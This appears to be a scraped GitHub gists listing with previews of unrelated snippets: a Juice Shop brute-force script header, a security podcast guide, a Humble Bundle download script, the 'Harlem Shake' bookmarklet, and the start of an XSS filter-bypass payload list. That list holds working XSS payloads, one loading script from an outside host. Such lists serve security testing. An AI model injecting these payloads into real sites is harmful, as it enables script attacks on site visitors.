Skip to content

Instantly share code, notes, and snippets.

View bkimminich's full-sized avatar

Björn Kimminich bkimminich

1.1k followers · 214 following
View GitHub Profile
@philly-vanilly
philly-vanilly / juice-shop-mortys-question-brute-force.py
Last active August 4, 2024 20:02
#!/usr/local/bin/python3.7
import itertools
import random
import ipaddress
import time
import aiohttp
import asyncio
base_url = 'http://localhost:3000'
@Aashish683
Aashish683 / GSoC-2018.md
Last active March 27, 2019 11:46
Summary of the work which I did during Google Summer of Code 2018 with OWASP.

This gist describes the work which was done in the Frontend Technology Update project the summer for the OWASP Juice Shop Project under Google Summer of Code 2018. The work for the project done is in the gsoc-frontend branch of the Juice shop repository while the work done for the Challenge Pack project by @CaptainFreak is in the gsoc-challenges branch. Both the branches were rebased to a third branch gsoc-integration which would contain the combined progress overall by both projects.

The project was split into three phases:

  1. Components and services were created in Angular that would replace the controllers and services in AngularJS. Unit tests
@7MinSec
7MinSec / CryptoLockerd.md
Last active November 15, 2018 18:48
This is an infosec-themed song called CryptoLocker'd

You can listen to this song on episode #276 of the 7 Minute Security podcast

Verse 1

You said you wouldn't do it
You said you wouldn't click that link
But you totally did
It’s clear you didn’t stop and think
How the promise of a free burrito would be all that it took
To open up our networks to virtual crooks

@7MinSec
7MinSec / 7MS_episode_guide.md
Last active April 21, 2025 17:01
7 Minute Security podcast episode guide

7 Minute Security podcast - full episode guide

Below is a blurb on each podcast episode, as well as a link to the corresponding show notes (if available). I apologize but this gist is often a little outdated, so to view the show notes for the latest episodes be sure to also check out 7MinSec.com.



7MS #671: Pentesting GOAD

Published: Friday, April 18, 2025

@barrywoolgar
barrywoolgar / hb_all_books_dl.js
Created September 2, 2016 11:06 — forked from graymouser/hb_all_books_dl.js
Humble bundle book bundles - download all books at once
/*
After purchasing a humble book bundle, go to your download page for that bundle.
Open a console window for the page and paste in the below javascript.
This will download all the books in all the formats available.
*/
$('a').each(function(i){
if (['MOBI', 'PDF', 'EPUB'].indexOf($.trim($(this).text())) >= 0) {
$('body').append('<iframe id="dl_iframe_'+i+'" style="display:none;">');
document.getElementById('dl_iframe_'+i).src = $(this).data('web');
}
@garybernhardt
garybernhardt / types.markdown
Last active April 11, 2025 17:07

This document has moved!

It's now here, in The Programmer's Compendium. The content is the same as before, but being part of the compendium means that it's actively maintained.

@marcaube
marcaube / harlem-shake.js
Created April 8, 2016 18:04
Harlem Shake, a script to make those XSS dance
// Source: http://pastebin.com/aJna4paJ
javascript:(function(){function c(){var e=document.createElement("link");e.setAttribute("type","text/css");e.setAttribute("rel","stylesheet");e.setAttribute("href",f);e.setAttribute("class",l);document.body.appendChild(e)}function h(){var e=document.getElementsByClassName(l);for(var t=0;t<e.length;t++){document.body.removeChild(e[t])}}function p(){var e=document.createElement("div");e.setAttribute("class",a);document.body.appendChild(e);setTimeout(function(){document.body.removeChild(e)},100)}function d(e){return{height:e.offsetHeight,width:e.offsetWidth}}function v(i){var s=d(i);return s.height>e&&s.height<n&&s.width>t&&s.width<r}function m(e){var t=e;var n=0;while(!!t){n+=t.offsetTop;t=t.offsetParent}return n}function g(){var e=document.documentElement;if(!!window.innerWidth){return window.innerHeight}else if(e&&!isNaN(e.clientHeight)){return e.clientHeight}return 0}function y(){if(window.pageYOffset){return window.pageYOffset}return Math.max(document.documentElement.
@denilsonsa
denilsonsa / README.md
Last active December 17, 2024 04:39
Embed VTT subtitles into HTML

Embed VTT subtitles into HTML

Objective

I have a video file on my local disk. I also have some subtitles (in HTML5's [WebVTT][] format).

I want to create an HTML file to play that video with subtitles, all from the local filesystem.

Problem

@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 21, 2025 14:41
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@staltz
staltz / introrx.md
Last active June 28, 2025 13:44
The introduction to Reactive Programming you've been missing